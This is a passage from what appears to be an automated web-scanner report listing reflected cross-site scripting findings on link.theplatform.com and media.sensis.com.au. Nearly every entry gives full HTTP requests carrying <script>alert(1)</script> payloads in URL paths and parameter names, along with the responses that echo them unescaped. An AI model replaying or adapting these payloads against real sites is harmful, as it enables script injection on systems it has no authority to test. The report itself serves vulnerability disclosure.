Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 20:19:13 GMT
Access-Control-Allow-Origin: *
Content-Type: application/smil; charset=UTF-8
X-Cache: HIT from link.theplatform.com:80
Cache-Control: max-age=5
Connection: close
Server: Jetty(6.1.19)

<smil xmlns="http://www.w3.org/2005/SMIL21/Language">
<head>
</head>
<body>
<seq>
<switch>
   <video src="http://fbchdvod-f.akamaihd.net/z/Fox.com/2/289/GLEE_303_First_Look_Asian_F_2500.mp4?hdnea=ip=50.
...[SNIP]...
<param name="trackingData" value="b=333085|cc=US|ci=1|cid=1343887|d=1317759553892|l=144597|p=Homepage Player - Network HP Featured Clipsdb47d<script>alert(1)</script>0e109b9d114|rc=TX|rid=1344184"/>
...[SNIP]...

1.37. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [format parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/JV5bOqASsrxR

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 8fa14<script>alert(1)</script>933a798a5b1 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL8fa14<script>alert(1)</script>933a798a5b1&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Date: Tue, 04 Oct 2011 20:19:14 GMT
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store
Connection: close
Server: Jetty(6.1.19)

{
   "title": "Unsupported Metafile Format",
   "description": "'SMIL8fa14<script>alert(1)</script>933a798a5b1' is not a supported metafile format.",
   "isException": true,
   "exception": "UnsupportedFormat",
   "responseCode": "400"
}

1.38. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2eb6f"><script>alert(1)</script>5e9e856ebbd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver2eb6f"><script>alert(1)</script>5e9e856ebbd/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:24 GMT
X-DirectServer: DS6
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d38000000002eb6f"><script>alert(1)</script>5e9e856ebbd/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.39. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44942"><script>alert(1)</script>1a35826ae0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random44942"><script>alert(1)</script>1a35826ae0=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:27 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 414
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random44942"><script>alert(1)</script>1a35826ae0=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.40. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de975"><script>alert(1)</script>05535384c68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939?de975"><script>alert(1)</script>05535384c68=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:12:19 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 418
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939?de975"><script>alert(1)</script>05535384c68=1&relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.41. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9aaa"><script>alert(1)</script>8613fae918b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverf9aaa"><script>alert(1)</script>8613fae918b/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:42 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000f9aaa"><script>alert(1)</script>8613fae918b/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.42. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 539a8"><script>alert(1)</script>743c7d9af22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random539a8"><script>alert(1)</script>743c7d9af22=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:45 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 415
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random539a8"><script>alert(1)</script>743c7d9af22=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947/relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.43. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f256"><script>alert(1)</script>4a926be100 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947?4f256"><script>alert(1)</script>4a926be100=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/bphf/header/adh.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:11:37 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 417
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003cd5338cd0d3800000000/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947?4f256"><script>alert(1)</script>4a926be100=1&relocate=http://clk.atdmt.com/OMA/go/343623776/direct/01/" target="_blank">
...[SNIP]...

1.44. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6904"><script>alert(1)</script>e367996f762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverf6904"><script>alert(1)</script>e367996f762/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:43 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000f6904"><script>alert(1)</script>e367996f762/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.45. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d607d"><script>alert(1)</script>5d682b42722 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomd607d"><script>alert(1)</script>5d682b42722=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:45 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_randomd607d"><script>alert(1)</script>5d682b42722=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.46. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a982e"><script>alert(1)</script>7c444ae9300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?a982e"><script>alert(1)</script>7c444ae9300=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:37 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 322
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?a982e"><script>alert(1)</script>7c444ae9300=1" target="_new">
...[SNIP]...

1.47. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99cbb"><script>alert(1)</script>747a230ed95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver99cbb"><script>alert(1)</script>747a230ed95/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:11 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d380000000099cbb"><script>alert(1)</script>747a230ed95/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.48. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93677"><script>alert(1)</script>44e502d5c1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random93677"><script>alert(1)</script>44e502d5c1b=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random93677"><script>alert(1)</script>44e502d5c1b=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.49. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1dfb"><script>alert(1)</script>d811a4a1280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?b1dfb"><script>alert(1)</script>d811a4a1280=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
